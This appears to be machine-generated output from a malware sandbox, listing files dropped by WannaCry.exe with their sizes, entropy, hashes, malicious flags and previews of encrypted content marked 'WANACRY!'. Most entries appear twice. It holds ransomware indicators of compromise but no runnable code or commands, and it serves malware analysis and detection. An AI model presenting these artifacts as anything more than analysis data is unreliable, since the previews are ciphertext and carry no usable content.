                                                                              SSDEEP:3072:iv8a1HYeGdfFDorNRv6mE6BA0nfBM0dXVl7P3H6Xvtm1JcDz:iZxo8rrBzOIB9FPKXVGJ0
                                                                              MD5:D10FB801B7E1917F2F80908CE633AC98
                                                                              SHA1:0CE2A9035BDB8FBAA321B6FF5DADCE70750654EE
                                                                              SHA-256:45711C18EA90C73AB47EF8DFCBB70A0ACF8EE69D0A4790CE2C58800F67AEC784
                                                                              SHA-512:26894B06048D31F7080641256FD3F63CAEABB5A885C3CE70BC1318C61BAC29BA3695C036CA08ADE1B941AE6A86ADFE024592D1E64011515E605D44A0B3289D60
                                                                              Malicious:true
                                                                              Preview:WANACRY!....Av........z...&.k,.........;=Z.Z.,...\)E.i.f.Q^...UL...5....&g...b..V.&............/h...T..W....;.l..+........>..<.4<.$..mf."........._OgQ..3?C .sX..:x......5...!.[.{..NJ...V./|.>fn2...l.]._...m..@2..Z.5.R...l....rg..b...O..o... ....O..I|.B....<........Qt...L.....S..eI.t.m...y....O...I..v.t9a.....v.o..a.Vz.d..fd...........u..;h....&..t..zO.-..L.7.T..h3.......7..Q...B*.....[wU.bc.ejD2L..Q..c:.....2.'...U..<..N.H#......a...K[2.j.......~.~.%...ZG.X..K@H.%...M..I.u.2.u/F.\#..D..h`0.g>..yg...t.v.u...gY3..s..q..R......W..T...d.o.Tw.....o..X.c&.p{]4:.. .._j...>.Y[.|..w#.6Q...X.n......>....>4......7..=...d.(....kI..l._F..\.07.....Vr...B..r9i..)..G..2...b.V..=!.D..w...o.4..$0%..>. ......(.Q.5.2_..;RT<}9.....B.cu..;...M=....I.%~.\.`.....=M*._..1m.......,...EQ..2...|..........9o@.h...-bDp.7S..~...M.Jk.l.)....@..%.d..:X..l.p.T.."..........V.....F...@....X.._.....9z.......Ax.Q....G..6U........h(9..0.K...e.K...M......=.&\.R..>...`6......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):131672
                                                                              Entropy (8bit):7.998503396916599
                                                                              Encrypted:true
                                                                              SSDEEP:3072:iv8a1HYeGdfFDorNRv6mE6BA0nfBM0dXVl7P3H6Xvtm1JcDz:iZxo8rrBzOIB9FPKXVGJ0
                                                                              MD5:D10FB801B7E1917F2F80908CE633AC98
                                                                              SHA1:0CE2A9035BDB8FBAA321B6FF5DADCE70750654EE
                                                                              SHA-256:45711C18EA90C73AB47EF8DFCBB70A0ACF8EE69D0A4790CE2C58800F67AEC784
                                                                              SHA-512:26894B06048D31F7080641256FD3F63CAEABB5A885C3CE70BC1318C61BAC29BA3695C036CA08ADE1B941AE6A86ADFE024592D1E64011515E605D44A0B3289D60
                                                                              Malicious:true
                                                                              Preview:WANACRY!....Av........z...&.k,.........;=Z.Z.,...\)E.i.f.Q^...UL...5....&g...b..V.&............/h...T..W....;.l..+........>..<.4<.$..mf."........._OgQ..3?C .sX..:x......5...!.[.{..NJ...V./|.>fn2...l.]._...m..@2..Z.5.R...l....rg..b...O..o... ....O..I|.B....<........Qt...L.....S..eI.t.m...y....O...I..v.t9a.....v.o..a.Vz.d..fd...........u..;h....&..t..zO.-..L.7.T..h3.......7..Q...B*.....[wU.bc.ejD2L..Q..c:.....2.'...U..<..N.H#......a...K[2.j.......~.~.%...ZG.X..K@H.%...M..I.u.2.u/F.\#..D..h`0.g>..yg...t.v.u...gY3..s..q..R......W..T...d.o.Tw.....o..X.c&.p{]4:.. .._j...>.Y[.|..w#.6Q...X.n......>....>4......7..=...d.(....kI..l._F..\.07.....Vr...B..r9i..)..G..2...b.V..=!.D..w...o.4..$0%..>. ......(.Q.5.2_..;RT<}9.....B.cu..;...M=....I.%~.\.`.....=M*._..1m.......,...EQ..2...|..........9o@.h...-bDp.7S..~...M.Jk.l.)....@..%.d..:X..l.p.T.."..........V.....F...@....X.._.....9z.......Ax.Q....G..6U........h(9..0.K...e.K...M......=.&\.R..>...`6......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):9272
                                                                              Entropy (8bit):7.979187724587084
                                                                              Encrypted:false
                                                                              SSDEEP:192:2LSlovr/yydeZyR8+yr9/cwVDvgP5pAtGaSugfUF:plIhIyK9EegxpYLtgy
                                                                              MD5:C5C142A642524C135E69520D7454BEC4
                                                                              SHA1:2666BCC9A93D1B532578A97150EDC4694A7C96AD
                                                                              SHA-256:1792CECC69D5DE85892CF79BC21D259736C8236F455B984057294F06F3949CCE
                                                                              SHA-512:3A848CEE9A2B9223B7A15578929A8AEDC60B2FF3A389D75F7398151A7DD737D6B6B5BBB4016089DA8260BC8B74F15DEAA9F99F6C05EC57C3B289D796560A8760
                                                                              Malicious:false
                                                                              Preview:WANACRY!......+MR.lDpA........9k.sA{.*!\...{u.'~....m..^...(.q.,.p...1"...(.4..5...+.w.B..c.bU.`.&Yd...g.., ....7..n.F.d,I`G..G..4..`}~?.Q..|.|....2BA.i^......)A..2.].p....j..ph/./.]..j..\.@7.A..5.e..V..?..V...[..o..n....5.O..3+....#y.p.R...%...e.2.|a.3./^.0.t6.....#........v.......ZgN7D.r...4!....{....E..t;.V.."..Z.... ..P....0i.r...].{D.D<.\L.u0..8..\.0......'...BEVN....X.i4..L....:W..Z..z..#..8..c.\.. ?....Q.LF.]d#:..~.&...*..f.h....7....:....6.S....&.J2.,..z......BR...0L...........Km_d...o0f&.......:.....,]...l#...Aq.c.......57s.%%D.#..b,.&L..[S..;R.[.Jw.....AJ.....>eh..W.2.~..._.....$.=u..-.....(7M...qz..j...O..z.......K.]g.3......uA.`zw....!...........GC..yHy.K..k.4....R.......4..../9...r.IE5..t,s%......?*.u!.#}..x.......c...o..t..._Y.FF..gj(Q..V..P...~...l..b....:.50..qr.....~..S........[.6....{.E...K=}.p....:.o......{..B..d:-.-.J...jy....ab:*&.....b..q...Sn.QDS.`H..Z.0....b...H~e.......C.C...q@L.rR.G.....E..=.,A.@E,..;.`..w75......`
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):9272
                                                                              Entropy (8bit):7.979187724587084
                                                                              Encrypted:false
                                                                              SSDEEP:192:2LSlovr/yydeZyR8+yr9/cwVDvgP5pAtGaSugfUF:plIhIyK9EegxpYLtgy
                                                                              MD5:C5C142A642524C135E69520D7454BEC4
                                                                              SHA1:2666BCC9A93D1B532578A97150EDC4694A7C96AD
                                                                              SHA-256:1792CECC69D5DE85892CF79BC21D259736C8236F455B984057294F06F3949CCE
                                                                              SHA-512:3A848CEE9A2B9223B7A15578929A8AEDC60B2FF3A389D75F7398151A7DD737D6B6B5BBB4016089DA8260BC8B74F15DEAA9F99F6C05EC57C3B289D796560A8760
                                                                              Malicious:false
                                                                              Preview:WANACRY!......+MR.lDpA........9k.sA{.*!\...{u.'~....m..^...(.q.,.p...1"...(.4..5...+.w.B..c.bU.`.&Yd...g.., ....7..n.F.d,I`G..G..4..`}~?.Q..|.|....2BA.i^......)A..2.].p....j..ph/./.]..j..\.@7.A..5.e..V..?..V...[..o..n....5.O..3+....#y.p.R...%...e.2.|a.3./^.0.t6.....#........v.......ZgN7D.r...4!....{....E..t;.V.."..Z.... ..P....0i.r...].{D.D<.\L.u0..8..\.0......'...BEVN....X.i4..L....:W..Z..z..#..8..c.\.. ?....Q.LF.]d#:..~.&...*..f.h....7....:....6.S....&.J2.,..z......BR...0L...........Km_d...o0f&.......:.....,]...l#...Aq.c.......57s.%%D.#..b,.&L..[S..;R.[.Jw.....AJ.....>eh..W.2.~..._.....$.=u..-.....(7M...qz..j...O..z.......K.]g.3......uA.`zw....!...........GC..yHy.K..k.4....R.......4..../9...r.IE5..t,s%......?*.u!.#}..x.......c...o..t..._Y.FF..gj(Q..V..P...~...l..b....:.50..qr.....~..S........[.6....{.E...K=}.p....:.o......{..B..d:-.-.J...jy....ab:*&.....b..q...Sn.QDS.`H..Z.0....b...H~e.......C.C...q@L.rR.G.....E..=.,A.@E,..;.`..w75......`
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):17784
                                                                              Entropy (8bit):7.988662245552596
                                                                              Encrypted:false
                                                                              SSDEEP:384:IDqwrKVB4C67Iwy77Ef7SdN6B+JRjscKPtCFB34juY/DiH:IDqwrKVB4CwO3EWdN6IJRwPVCFB3kf/m
                                                                              MD5:129DDFCA68249CB8CBC237F9F2DF3B0B
                                                                              SHA1:B639695C1457E6A046A47F4344D4C66770A5FA9D
                                                                              SHA-256:75140364872B161F8DF923E3325125DC990F5B44A9BD666E6C9792E7A6AD7250
                                                                              SHA-512:6D5FEEB2FFD0CCFED11B649FB053AE96A18FE773ADE1329679E1268BDBD277D7BD9CF364A227E5B99ED076AF436448E312CB0B01DECBC445254853D73C8BF97E
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......BP-.q...b.'Up\..|t.C....8...8...6..W6x..q...}c.!..zO.Kd.....@.=.F}'./N...*.`. U.........V..@x........^$.d(..?<]......z....3k.....}..-.[..@..<.Ib.)6.V.$.A.3.!a.\a#A..U`..|b...........'.....d...Zml*C.HV.......{...r.:G...*.......'.N......W..x~.E....ZD......c...8!.y.......P'.b..G..^.....dis.5K@.-.k.T.....&...]...l.A.A...A......j.....0......=.3..Zv.<.4....x.....q.D......&,........./..{}.......=Y.hM.n.;Yc.Ug...}..2....|..(.K....l$..D.}.."..|.i.4.. ........j.{.Wh...p....1.e...w.) ....tYv.sK5R._.l..$....'..R1..s4F1.!k..C>..L!.Y......5.Ra...8.yLb..*..!XZ.6..p\E[...."..4..w}OekMB.....G!..7././..............J...<.y..z..7Y...k.)%y.r[-_i.4.5.=.......v.|l.B..@nN..EF.h...{...Fmnc/...J...-)......S:.e\........\.1.6...&.G.B.n........<i...^......q..r..$O@.d....T.........(.....f...'&e.....I.h.......[.0..C..DA.L.s..p...y<d..2..i..]..kk.Q*...f.A.I.l..e.x.].zY..$...a.....94=yS#Ya:..1xI/n.f.v.j'.0...~...~F..Sd&Gd.sC.~+;....@\|...L..'.H..m..C....3.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):17784
                                                                              Entropy (8bit):7.988662245552596
                                                                              Encrypted:false
                                                                              SSDEEP:384:IDqwrKVB4C67Iwy77Ef7SdN6B+JRjscKPtCFB34juY/DiH:IDqwrKVB4CwO3EWdN6IJRwPVCFB3kf/m
                                                                              MD5:129DDFCA68249CB8CBC237F9F2DF3B0B
                                                                              SHA1:B639695C1457E6A046A47F4344D4C66770A5FA9D
                                                                              SHA-256:75140364872B161F8DF923E3325125DC990F5B44A9BD666E6C9792E7A6AD7250
                                                                              SHA-512:6D5FEEB2FFD0CCFED11B649FB053AE96A18FE773ADE1329679E1268BDBD277D7BD9CF364A227E5B99ED076AF436448E312CB0B01DECBC445254853D73C8BF97E
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......BP-.q...b.'Up\..|t.C....8...8...6..W6x..q...}c.!..zO.Kd.....@.=.F}'./N...*.`. U.........V..@x........^$.d(..?<]......z....3k.....}..-.[..@..<.Ib.)6.V.$.A.3.!a.\a#A..U`..|b...........'.....d...Zml*C.HV.......{...r.:G...*.......'.N......W..x~.E....ZD......c...8!.y.......P'.b..G..^.....dis.5K@.-.k.T.....&...]...l.A.A...A......j.....0......=.3..Zv.<.4....x.....q.D......&,........./..{}.......=Y.hM.n.;Yc.Ug...}..2....|..(.K....l$..D.}.."..|.i.4.. ........j.{.Wh...p....1.e...w.) ....tYv.sK5R._.l..$....'..R1..s4F1.!k..C>..L!.Y......5.Ra...8.yLb..*..!XZ.6..p\E[...."..4..w}OekMB.....G!..7././..............J...<.y..z..7Y...k.)%y.r[-_i.4.5.=.......v.|l.B..@nN..EF.h...{...Fmnc/...J...-)......S:.e\........\.1.6...&.G.B.n........<i...^......q..r..$O@.d....T.........(.....f...'&e.....I.h.......[.0..C..DA.L.s..p...y<d..2..i..]..kk.Q*...f.A.I.l..e.x.].zY..$...a.....94=yS#Ya:..1xI/n.f.v.j'.0...~...~F..Sd&Gd.sC.~+;....@\|...L..'.H..m..C....3.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):776
                                                                              Entropy (8bit):7.719036162174347
                                                                              Encrypted:false
                                                                              SSDEEP:12:bkEhKJKdh44bpkBFQZOGNldRa1QmY5rF4/WOCMgJXgm6l/3ZH9KWCSd3XTXI0o4d:bkMRHD0FQcsiLY4wJwJ1HkpKGCL9Qgn
                                                                              MD5:0388D335DC61E0453322382FCF2C29C8
                                                                              SHA1:94D36C9D2BA5D38AF50E75932E005A9A6F8D1514
                                                                              SHA-256:BF79E4DC68367092189610E7AF954E8942186B1E991F0CEED81261BC27F0934A
                                                                              SHA-512:7391BE8504B06B27235ACC13996FFFBB9CAF19C64F264CEC836E630F76F6AB14F5220F557132F75D817641C72642F4DB8A6B81CFCDD735AF826D15F344370950
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......4.Wn.8.E......Q..D:Z.3e.$0(.,+.....Py.....A.X..0e1.D... ...3...n.q......o.IT."Q..PV...1.O4....N.o..s:.GH]..(..M.7...!....H{A..%.Z..D>..-7T.){.w..^7.V.f..%H[....x..H...o.....y....^.;...>..`d.Tm..W....x[T.P.^.L-..8S....(t.f..!.N..Dx......8...............f..g.x.I.....P\.z?`/1.....[.>..)b...+.9.6%.f.$.Q9.gS.1..../b(y..1.I!.#...b.R_.3\....3..K..h~.01.[.}O......R....l..\FS...@.kp.|.1... .1.<G.!4.......o.g..nH*.............r[.>W...&.....U...B|.....h....."l.l.w....W....(...nD..\...~...aS......~...."....3.2...@.r*F.i#..C#..Z}.L.....S.h.gU{.;..j..fir.SK..*...8.$.(....b....[.......C8]..O.w.B.R%?.e..j...l.L..\...>........[..m.....i.m.......H.... q..,.3....Mm......`..%..........l...V....=.>hG.H..H..%7A.?:..P..9.........R.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):776
                                                                              Entropy (8bit):7.719036162174347
                                                                              Encrypted:false
                                                                              SSDEEP:12:bkEhKJKdh44bpkBFQZOGNldRa1QmY5rF4/WOCMgJXgm6l/3ZH9KWCSd3XTXI0o4d:bkMRHD0FQcsiLY4wJwJ1HkpKGCL9Qgn
                                                                              MD5:0388D335DC61E0453322382FCF2C29C8
                                                                              SHA1:94D36C9D2BA5D38AF50E75932E005A9A6F8D1514
                                                                              SHA-256:BF79E4DC68367092189610E7AF954E8942186B1E991F0CEED81261BC27F0934A
                                                                              SHA-512:7391BE8504B06B27235ACC13996FFFBB9CAF19C64F264CEC836E630F76F6AB14F5220F557132F75D817641C72642F4DB8A6B81CFCDD735AF826D15F344370950
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......4.Wn.8.E......Q..D:Z.3e.$0(.,+.....Py.....A.X..0e1.D... ...3...n.q......o.IT."Q..PV...1.O4....N.o..s:.GH]..(..M.7...!....H{A..%.Z..D>..-7T.){.w..^7.V.f..%H[....x..H...o.....y....^.;...>..`d.Tm..W....x[T.P.^.L-..8S....(t.f..!.N..Dx......8...............f..g.x.I.....P\.z?`/1.....[.>..)b...+.9.6%.f.$.Q9.gS.1..../b(y..1.I!.#...b.R_.3\....3..K..h~.01.[.}O......R....l..\FS...@.kp.|.1... .1.<G.!4.......o.g..nH*.............r[.>W...&.....U...B|.....h....."l.l.w....W....(...nD..\...~...aS......~...."....3.2...@.r*F.i#..C#..Z}.L.....S.h.gU{.;..j..fir.SK..*...8.$.(....b....[.......C8]..O.w.B.R%?.e..j...l.L..\...>........[..m.....i.m.......H.... q..,.3....Mm......`..%..........l...V....=.>hG.H..H..%7A.?:..P..9.........R.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1810872
                                                                              Entropy (8bit):7.999879693089774
                                                                              Encrypted:true
                                                                              SSDEEP:49152:hZl9KgOUBIfdG1JFICIST2cRyWxjEQMfNUefYyXz:h3aUGfdctTV/xjCfNUaV
                                                                              MD5:A396CADBDFC318E3BD3683BA286CD165
                                                                              SHA1:1F05DA7016CE452632B770519ACEE64D5568C8D6
                                                                              SHA-256:6E2C278C926A99A475FDBDF202F24B50F9F3F417B256C3CDA292C5A8DB8220BE
                                                                              SHA-512:1172FB4882B2B8C1785DBBB95A488420270E86CAFCCF57810DC4958DFD723EF84FA55B1ECA68D79DADBDB8B741425B37D5C538092BDBFA327A27AC0ECEC36082
                                                                              Malicious:true
                                                                              Preview:WANACRY!....7SU.<j..(_.....R.=."\w.s....9.mE..W.....Y.B.8......t......rU.=.qm..551........u.K..V....{...E=.K_=w.3L..Jb...[.xj..e....Mjk?c..V.RN.|...,'.5..-g..x.]|.7.&.q.*.qeA.L.V..Q....}...@...3X(.9......E.KdE....A.h/..R8..=..mR\?M..0.0.....Q+.?.&S.Y.................4......d....Q\.._.#.R.....R.,./...X#.)........ .x...eD....hfjY..o..c=.Rs.h.IJ_f.r....].Yy%..g.......?.H..8..~9A=..9.3.{.....xWx.=.,..Xv#E5.......'R..UX.o...Y.b..\.S.84.7V=3W.l.x...:..}...5F)}7..8&.u.Z..9...5..6Cd|y:..z;...G........W.......7.FY.#..\..&.:"..........K.....<rJ).......k.y.$....0.s.].^..b#.k.oA.5....]9^...t..$...-hv[.ydB"....xpQ.(`l....x.S....+>.jLP.......]l@......S%Y.]G../z....s.......|K.M...>.k .ap..._(...%V.N.G....n.7....v.....!.Gw..8......S_wu|..i.v.lA...."..<.#.X.....Z.;..i...Yj.2.z..dI.X.... ......[..y...Y...Ey....>.#.Pb.......o..H.B.....n.x....P_......D..........k. '.S.o.9.1...r5..X.@.(k ....~..J.hWzC.......:e...bP0w.e...%.[..{.m-H;...L.}.....:@.Y
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1810872
                                                                              Entropy (8bit):7.999879693089774
                                                                              Encrypted:true
                                                                              SSDEEP:49152:hZl9KgOUBIfdG1JFICIST2cRyWxjEQMfNUefYyXz:h3aUGfdctTV/xjCfNUaV
                                                                              MD5:A396CADBDFC318E3BD3683BA286CD165
                                                                              SHA1:1F05DA7016CE452632B770519ACEE64D5568C8D6
                                                                              SHA-256:6E2C278C926A99A475FDBDF202F24B50F9F3F417B256C3CDA292C5A8DB8220BE
                                                                              SHA-512:1172FB4882B2B8C1785DBBB95A488420270E86CAFCCF57810DC4958DFD723EF84FA55B1ECA68D79DADBDB8B741425B37D5C538092BDBFA327A27AC0ECEC36082
                                                                              Malicious:true
                                                                              Preview:WANACRY!....7SU.<j..(_.....R.=."\w.s....9.mE..W.....Y.B.8......t......rU.=.qm..551........u.K..V....{...E=.K_=w.3L..Jb...[.xj..e....Mjk?c..V.RN.|...,'.5..-g..x.]|.7.&.q.*.qeA.L.V..Q....}...@...3X(.9......E.KdE....A.h/..R8..=..mR\?M..0.0.....Q+.?.&S.Y.................4......d....Q\.._.#.R.....R.,./...X#.)........ .x...eD....hfjY..o..c=.Rs.h.IJ_f.r....].Yy%..g.......?.H..8..~9A=..9.3.{.....xWx.=.,..Xv#E5.......'R..UX.o...Y.b..\.S.84.7V=3W.l.x...:..}...5F)}7..8&.u.Z..9...5..6Cd|y:..z;...G........W.......7.FY.#..\..&.:"..........K.....<rJ).......k.y.$....0.s.].^..b#.k.oA.5....]9^...t..$...-hv[.ydB"....xpQ.(`l....x.S....+>.jLP.......]l@......S%Y.]G../z....s.......|K.M...>.k .ap..._(...%V.N.G....n.7....v.....!.Gw..8......S_wu|..i.v.lA...."..<.#.X.....Z.;..i...Yj.2.z..dI.X.... ......[..y...Y...Ey....>.#.Pb.......o..H.B.....n.x....P_......D..........k. '.S.o.9.1...r5..X.@.(k ....~..J.hWzC.......:e...bP0w.e...%.[..{.m-H;...L.}.....:@.Y
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):89784
                                                                              Entropy (8bit):7.997466723814918
                                                                              Encrypted:true
                                                                              SSDEEP:1536:zsxv4I+tsuxNib9Mnaf6A5fperZOTr1f6+Mk0fuCkAu7plfUtpwbt0f86xu3qfl4:zsxv4VCuSb9uwFYrZOz30WCIfdb6P8qy
                                                                              MD5:E84E89262A4092957163E60EC1AECF16
                                                                              SHA1:258B66F0C4F94F7FADE54474207A405788A4C1BB
                                                                              SHA-256:95FFE497FA6D4973445EE29A6A6E13C62610E6F35B9461E7080024357DEC4771
                                                                              SHA-512:454DE93D7FA81AE3FC077C91A0C8A658B7333FF88EE9644C3945C0C0EC44DDD307CAAAAFA2BB228CBAFC1F8ABB2B80F832AB7010FFB213355D0A2FDC1AEFE7C9
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....c...n...WIYVwqX1..m.?.F.u..&u.y.J%..j.4..a.%.v/..Yu..K?7.R. ......(..[.....J.m.`TL..>.}..i..x.....#....\[....P.........l...~..zu.u...uG.A.|.....(....7...gZK.R|@...db}........A.L....Ls..(......F,..UB........gin...+O.6. .T..!=r.7...:N.B~....n..9.....]........<m..2J.cg..z..5.5..k..P....I./w....7...m..<0^...............dS.i...".L....A..P...-Q._..I.S#....4......n..t.8..-LT..huS~U....il.t.^....'.0?1....^2n.%....X..k}...&.9..........\W.{,(...<#....(.mu....M.......~3M.......3P..<..n.c..l...(0...[(q.......V..n..f..s....1..s).|.,....~..6..p.."?6...Vc..#...B.a...E._....L..A.>. ;.d.3"..s....}O&?.5(.Na..h2. ...... 9..}....=.%.q{`E....2.%..V..K....>.......6.....U..9..."..r........2.2..iT...p..I.;..Y...{....u.>.7b....|..+.<L,.]..5..T$k....N..M...!.......QL.I..Zm'@.rW,N@..b,3.Jb....?.....7 ..".\@...$u...Q..?_0.."...P=).h.b..cr....<.84......._.y..' .b.3..%!]...f$B.F.}.mp.#.sV. W...Yi ...N....<.......k.l..f..y..].._F..F.....0l3...u.tv.......}k.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):89784
                                                                              Entropy (8bit):7.997466723814918
                                                                              Encrypted:true
                                                                              SSDEEP:1536:zsxv4I+tsuxNib9Mnaf6A5fperZOTr1f6+Mk0fuCkAu7plfUtpwbt0f86xu3qfl4:zsxv4VCuSb9uwFYrZOz30WCIfdb6P8qy
                                                                              MD5:E84E89262A4092957163E60EC1AECF16
                                                                              SHA1:258B66F0C4F94F7FADE54474207A405788A4C1BB
                                                                              SHA-256:95FFE497FA6D4973445EE29A6A6E13C62610E6F35B9461E7080024357DEC4771
                                                                              SHA-512:454DE93D7FA81AE3FC077C91A0C8A658B7333FF88EE9644C3945C0C0EC44DDD307CAAAAFA2BB228CBAFC1F8ABB2B80F832AB7010FFB213355D0A2FDC1AEFE7C9
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....c...n...WIYVwqX1..m.?.F.u..&u.y.J%..j.4..a.%.v/..Yu..K?7.R. ......(..[.....J.m.`TL..>.}..i..x.....#....\[....P.........l...~..zu.u...uG.A.|.....(....7...gZK.R|@...db}........A.L....Ls..(......F,..UB........gin...+O.6. .T..!=r.7...:N.B~....n..9.....]........<m..2J.cg..z..5.5..k..P....I./w....7...m..<0^...............dS.i...".L....A..P...-Q._..I.S#....4......n..t.8..-LT..huS~U....il.t.^....'.0?1....^2n.%....X..k}...&.9..........\W.{,(...<#....(.mu....M.......~3M.......3P..<..n.c..l...(0...[(q.......V..n..f..s....1..s).|.,....~..6..p.."?6...Vc..#...B.a...E._....L..A.>. ;.d.3"..s....}O&?.5(.Na..h2. ...... 9..}....=.%.q{`E....2.%..V..K....>.......6.....U..9..."..r........2.2..iT...p..I.;..Y...{....u.>.7b....|..+.<L,.]..5..T$k....N..M...!.......QL.I..Zm'@.rW,N@..b,3.Jb....?.....7 ..".\@...$u...Q..?_0.."...P=).h.b..cr....<.84......._.y..' .b.3..%!]...f$B.F.}.mp.#.sV. W...Yi ...N....<.......k.l..f..y..].._F..F.....0l3...u.tv.......}k.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):467448
                                                                              Entropy (8bit):7.9995860221033785
                                                                              Encrypted:true
                                                                              SSDEEP:12288:QDDrLVi60eqmPrE55jnfCGUx2wvTCtvOfwTMo7pjH5EV4l0zKsq7:SDrPabTTvtIo7pjZEoKe
                                                                              MD5:0FFB054FC958B6A8C7101C58AF1C7CE1
                                                                              SHA1:18EF68CFB740C53215816D90DC0C63539A3B3412
                                                                              SHA-256:56CE38C6B576495E8768E332CE1441CA5E44D824B52174C8671184C0CCA9A1BA
                                                                              SHA-512:4392656E0E5E0D0C664FCDC024F38F9BA625006B975C8DF209CE2F55635643D8AC9CA09ADAAAB739F1D93144BC446144226A74B5947133275A781FA4BD98922C
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....2vc.dw]...'..*"`..Kl...z.@....P.*r ...#...rZ.o.....x.NK@.d...u..a.....DX.x=......._..>.4.|0e@...6[6g.F..E..C.....Zo....d..~..DJ. ..!.~.......B........V.f..9..|F..|...F..U.`d......&.t.......2... ...N.=.2[. ..X...R.G.....=.=E.'P....].......g.k...... .......f.D6....r...."..$..b}.=.......,..T...Z.&S...F.H..oh.p..fl....^B....s..:y.=2g. 3.Q<.9..]..N..I..%..Iv..u.....Ae......<.5.`....B.G9l.P.9.u.039.Mf#!.~O...z.....-^,.~.N......N..3Z..T$.m..!J-..Pc.L......v.15....KK.QZ.dzD....../q.....U..*.R...>...$Or..l8A$.'....FN....Q.!.............0.V'..&.t..M..S<.F.%#n?R....b.F${.A^..U+..... .*s...q.~..~i.9_.....T..4...F.RA._G.xCn./...L%..P.&..(...9*W.L.`Z...E..sB.).d..|...G.Z..{...R.y....=....g...n.....o.Q..|..$TB...vl..x..xwV.bj{../..V...,.y..>.0/....sTF.|M.2.N.D.&.b.G..l.....V<&...+...P..1m+3....^W....c,.yh0..X..bL.;.....Q..[5h..u.C./...gI.M...tS....=.VR.a$..v^.].7CjK;.....UF8A..` .8f..9{...tc..M..8.{.I.............iw....E..u...U..R...I.J.4
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):467448
                                                                              Entropy (8bit):7.9995860221033785
                                                                              Encrypted:true
                                                                              SSDEEP:12288:QDDrLVi60eqmPrE55jnfCGUx2wvTCtvOfwTMo7pjH5EV4l0zKsq7:SDrPabTTvtIo7pjZEoKe
                                                                              MD5:0FFB054FC958B6A8C7101C58AF1C7CE1
                                                                              SHA1:18EF68CFB740C53215816D90DC0C63539A3B3412
                                                                              SHA-256:56CE38C6B576495E8768E332CE1441CA5E44D824B52174C8671184C0CCA9A1BA
                                                                              SHA-512:4392656E0E5E0D0C664FCDC024F38F9BA625006B975C8DF209CE2F55635643D8AC9CA09ADAAAB739F1D93144BC446144226A74B5947133275A781FA4BD98922C
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....2vc.dw]...'..*"`..Kl...z.@....P.*r ...#...rZ.o.....x.NK@.d...u..a.....DX.x=......._..>.4.|0e@...6[6g.F..E..C.....Zo....d..~..DJ. ..!.~.......B........V.f..9..|F..|...F..U.`d......&.t.......2... ...N.=.2[. ..X...R.G.....=.=E.'P....].......g.k...... .......f.D6....r...."..$..b}.=.......,..T...Z.&S...F.H..oh.p..fl....^B....s..:y.=2g. 3.Q<.9..]..N..I..%..Iv..u.....Ae......<.5.`....B.G9l.P.9.u.039.Mf#!.~O...z.....-^,.~.N......N..3Z..T$.m..!J-..Pc.L......v.15....KK.QZ.dzD....../q.....U..*.R...>...$Or..l8A$.'....FN....Q.!.............0.V'..&.t..M..S<.F.%#n?R....b.F${.A^..U+..... .*s...q.~..~i.9_.....T..4...F.RA._G.xCn./...L%..P.&..(...9*W.L.`Z...E..sB.).d..|...G.Z..{...R.y....=....g...n.....o.Q..|..$TB...vl..x..xwV.bj{../..V...,.y..>.0/....sTF.|M.2.N.D.&.b.G..l.....V<&...+...P..1m+3....^W....c,.yh0..X..bL.;.....Q..[5h..u.C./...gI.M...tS....=.VR.a$..v^.].7CjK;.....UF8A..` .8f..9{...tc..M..8.{.I.............iw....E..u...U..R...I.J.4
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):16056
                                                                              Entropy (8bit):7.989193237234638
                                                                              Encrypted:false
                                                                              SSDEEP:192:pcIFM3FOnJp5IQAe2xoIPE6hHdPW7ntcwqBTuG+R54xs4GiJBUF+lYUSChZmqIJF:sk+Qo2gWjawLkx9JYYh05zgxMLHpIXe
                                                                              MD5:706BDADCE9B172837EB99A8D90C62211
                                                                              SHA1:9700FA1193EE350994793BD453E90E092DF8ED84
                                                                              SHA-256:55A156B7F4749FEEDD7179EF205F51FA34F8099D35BCAB9DF394DAC6E95A3360
                                                                              SHA-512:92D322D0FA83432C61D57018ADEEA55D36236F4ABB675A6DD7CC7D81D5ECE3B5BDB30348AFE1AAA5076C3FB61C53582438072A79D9A20C969E974A244A7EC48F
                                                                              Malicious:false
